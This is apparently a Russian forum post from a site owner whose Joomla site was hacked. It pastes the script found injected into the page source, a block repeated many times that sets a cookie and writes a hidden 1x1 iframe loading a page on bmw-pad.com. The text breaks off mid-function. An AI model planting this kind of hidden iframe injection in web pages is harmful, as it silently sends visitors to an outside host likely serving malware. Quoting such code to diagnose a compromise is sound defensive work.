Ломанули мой сайт на Joomla! какие-то недоноски
Новая тема Написать ответ
# Вс Май 09, 2010 5:58 pmYabuti Зарег.: 28.11.2008 ; Сообщ.: 16263Ответить с цитатой
В начале сорцев страницы стоит такой код:
Код:

[size=7]<SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
   var a_all_cookies = document.cookie.split( ';' );
   var a_temp_cookie = '';
   var cookie_name = '';
   var cookie_value = '';
   var b_cookie_found = false;
   for ( i = 0; i < a_all_cookies.length; i++ )
   {
      a_temp_cookie = a_all_cookies[i].split( '=' );
      cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
      if ( cookie_name == check_name )
      {
         b_cookie_found = true;
         if ( a_temp_cookie.length > 1 )
         {
            cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
         }
         return cookie_value;
         break;
      }
      a_temp_cookie = null;
      cookie_name = '';
   }
   if ( !b_cookie_found )
   {
      return null;
   }
}

var sn="gutji77";
if (Get_Cookie(sn) == null)
{
   Set_Cookie(sn, '76', 60*60*24);
        document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}

</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
   var today = new Date();
   today.setTime( today.getTime() );
   if ( expiresSeconds )
   {
      expires = expiresSeconds * 1000;
   }
   var expires_date = new Date( today.getTime() + (expires) );
   document.cookie = name + "=" +escape( value ) +
   ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}

function Get_Cookie( check_name ) {
